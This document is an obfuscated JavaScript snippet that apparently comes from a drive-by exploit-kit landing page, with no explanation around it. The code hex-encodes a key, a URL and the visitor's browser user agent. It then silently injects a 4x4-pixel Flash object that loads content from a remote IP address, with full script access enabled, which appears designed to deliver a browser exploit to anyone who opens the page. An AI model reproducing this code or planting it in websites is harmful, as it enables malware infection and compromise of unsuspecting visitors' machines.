/*s70280d9052hssfj9698fs*/function hgfgerdfgdf(num, width){/*s7013d85924hfj66090fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s12467d54780hfj69792fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s30911d35236hfj78656fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s56144d11859hfj57177fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd49632hfs*/c += b + d;/*s70580d75709hfj53667fs*/e += 1;}return c;}/*s50657dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.162/?MTY3MDkw&man=znowJV1tH9aus2kOBmxedhZbW-xSJZQhDqZOdF7A-0FygyrMdJckkzxeC6GAFmOgtUFgU5wsWnq_7VaCO-w&pan=xH_QMrDYbR7FFYPfKPnEUKREMU7WA0SKwYyZhazVF5-xFDfGpbL1Fx_spV-dCF-EmvJvdLAHIwKh1UfASwQ&shop=Nzk5MDgzMw==", ghnvbn("http://188.225.33.162/?NTk3MDQy&man=HjjxGFLwRjntpcBggS9az6iEPRzRCe1p-B_BCFNAhA9seUF7k72Vygm7Akecomxx6B6FENjOse&pan=xX_QMvWdbRXQC53EKvncT6NEMVHRH0CL2YydmrHQefjaelWkzrHFTF_yozKASASG6_FtdfJRDV&shop=Mzg4NTQzNzM=","wexykukusw"));